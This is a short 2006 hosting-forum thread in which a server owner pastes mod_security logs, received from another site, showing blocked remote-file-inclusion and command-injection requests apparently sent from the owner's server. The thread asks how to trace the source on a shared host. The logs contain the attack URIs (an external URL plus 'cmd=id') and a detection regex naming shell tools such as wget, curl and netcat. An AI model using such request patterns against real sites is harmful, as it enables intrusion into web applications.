Results 1 to 3 of 3
  1. #1

    attack from mod security?

    Code:
    [Sun Sep 10 21:01:51 2006] [error] [client xxx.xxx.xx.xxx] 
    mod_security: Access denied with code 403. Pattern match 
    "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|p
    m_path|path|pathtoroot|cat|pagina|path|include_location|root|page|goru
    mDir|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|comman
    d)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir 
    |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) 
    |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp 
    |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm 
    \-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname 
    "malwareremoval.com"] [uri 
    "/plog/index.php?op=http://busca.uol.com.br/uol/index.html?&cmd=id&art
    icleId=74&blogId=3"] [unique_id "GmtSE1KltBMAAHLtYzAAAAAW"] [Sun Sep 
    10 21:01:51 2006] [error] [client xxx.xxx.xx.xxx] mod_security: Access 
    denied with code 403. Pattern match 
    "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|p
    m_path|path|pathtoroot|cat|pagina|path|include_location|root|page|goru
    mDir|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|comman
    d)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir 
    |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) 
    |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp 
    |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm 
    \-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname 
    "malwareremoval.com"] [uri 
    "/plog/index.php?op=ViewArticle&articleId=http://busca.uol.com.br/uol/
    index.html?&cmd=id&blogId=3"] [unique_id "GneMgFKltBMAAHEkNIAAAAAL"] 
    [Sun Sep 10 21:01:52 2006] [error] [client xxx.xxx.xx.xxx] 
    mod_security: Access denied with code 403. Pattern match 
    "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|p
    m_path|path|pathtoroot|cat|pagina|path|include_location|root|page|goru
    mDir|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|comman
    d)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir 
    |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) 
    |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp 
    |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm 
    \-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname 
    "malwareremoval.com"] [uri 
    "/plog/index.php?op=ViewArticle&articleId=74&blogId=http://busca.uol.c
    om.br/uol/index.html?&cmd=id"] [unique_id "Gn9lzVKltBMAAHF4r8cAAAAA"]
    Someone (other hosting malwareremoval.com site) complained of an attack coming form my server IP which is strange. How would mod security cause an attack on another server?

  2. #2
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    I assume the Ip adress that is xx out in there is your IP and that is the log files they sent you to show it was an attack?

    If so they are not saying modsec was attacking any thing that is there log file showing that your server tried to attakc theirs and that is their mod security that blocked the attack.

  3. #3
    Strange coincidence that I have the same rules (I checked). Are you 100% sure?
    How can I trace who is causing the attack if it is true? Its a shared web server

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •